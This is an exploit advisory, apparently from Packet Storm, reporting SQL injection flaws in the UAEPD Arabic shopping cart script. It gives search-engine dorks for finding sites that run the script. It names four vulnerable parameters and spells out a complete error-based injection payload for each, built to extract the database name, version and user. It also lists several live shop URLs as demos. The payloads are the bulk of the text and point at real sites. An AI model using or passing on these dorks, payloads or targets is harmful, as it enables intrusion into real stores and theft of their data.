UAEPD Shopping Script suffers from multiple remote SQL injection vulnerabilities.
e6d58afc0a7ccc372d19bba4b96af7e5bca4d4f6d3b3a9bc0d6cb35b8f1f58eduaepd script – Multiple Sql Injection Vulnerabilty
====================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.uaepd.net/
.:. Dork : [1]inurl:”products.php?cat_id=” “Powered by: PD ”
[2]inurl:”products.php?p_id” “Powered by: PD ”
[3]inurl:”page.php?id=” “Powered by: PD ”
[4]inurl:”news.php?id=” “Powered by: PD ”
####################################################################
I. INTORUCTION
uaepd script is arabic Shopping Cart Script and have many Features
II. DESCRIPTION
#Control Panel provides an Arabic or English.
#View the store for the visitor in Arabic and English.
#Possibility to choose one language or operating languages.
#The ability to add unlimited number of pages.
#Format property provides all store pages.
#Add YouTube links and images in all the pages of the store.
#The ability to add sections of main and sub.
#Add an unlimited number of products.
#Add multiple images of the products.
#Availability of property sizes and colors for each product.
#Print logo on the product images automatically.
#Availability of property with a shipping price for each region.
#Buy products shopping cart system.
#You can ask system of members with or without system.
#Three ways to pay:(bank transfer-Receipt & received-Paypal).
#Send an e-mail automatically to any purchase or booking.
#Provide a search feature in the products.
#Availability of the currencies of the property.
#Comprehensive statistics for the purchases and reservations.
#Guestbook available partition.
#Provide property advertising space multiple places.
#Property provides the tape device.
#Offers the possibility to close or open the store.
III. TYPE BUG
Sql injection (command double query)
IV. BUG
site/products.php?cat_id=[sql injection]
site/products.php?p_id=[sql injection]
site/page.php?id=[sql injection]
site/news.php?id=[sql injection]
VII. EXPLOIT
TO EXTRACT VERSION & NAME & USER DATABASE:
site/products.php?cat_id=99999+and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
site/products.php?p_id=99999+and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
site/page.php?id=99999+and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
site/news.php?id=99999+and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
DEMOS:
http://sedenshop.com/products.php?p_id=3
http://www.henna.ae/products.php?cat_id=1
http://www.shah-een.com/news.php?id=1
http://www.nourita.com/products.php?cat_id=4
####################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed